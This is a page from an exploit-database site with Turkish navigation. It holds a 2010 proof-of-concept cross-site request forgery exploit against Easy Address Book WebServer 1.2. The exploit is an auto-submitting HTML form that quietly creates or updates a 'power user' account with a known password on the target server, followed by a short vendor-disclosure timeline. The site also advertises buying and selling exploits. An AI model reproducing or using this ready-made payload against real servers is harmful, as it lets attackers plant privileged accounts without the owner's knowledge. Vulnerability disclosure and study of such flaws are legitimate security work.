0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Easy Address book Webserver 1.2 CSRF
Yazar
Risk
![](/img/risk/critlow_0.gif)
Security Risk Unsored
]0day-ID
Kategori
Eklenme Tarihi
Platform
==================================== Easy Address book Webserver 1.2 CSRF ==================================== # Software : Easy Address Book WebServer 1.2 # Author : Markot # Date : May 25, 2010 # OS : Windows # Tested on : XP SP3 En (Virtual box) # Type of vuln : CSRF # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #code <html> <body> <body onload="document.forms['Login'].submit();"> <form method="POST" name="Login" action="http://192.168.1.200:80/users_admin.ghp"> <input type="hidden" name="userid" value="3"/> <input type="hidden" name="username" value="corelanteam"/> <input type="hidden" name="password" value="corelanteam"/> <input type="hidden" name="email" value="[email protected]"/> <input type="hidden" name="level" value="power user"/> <input type="hidden" name="state" value="Enable"/> <input type="hidden" name="add_user" value="Update"/> </form> </body> </html> Author/Vendor communication May 1 2010 : vendor contacted May 17 2010: reminder sent, no feedback from the vendor May 25 2010: Public disclosure # 0day.today [2024-07-16] #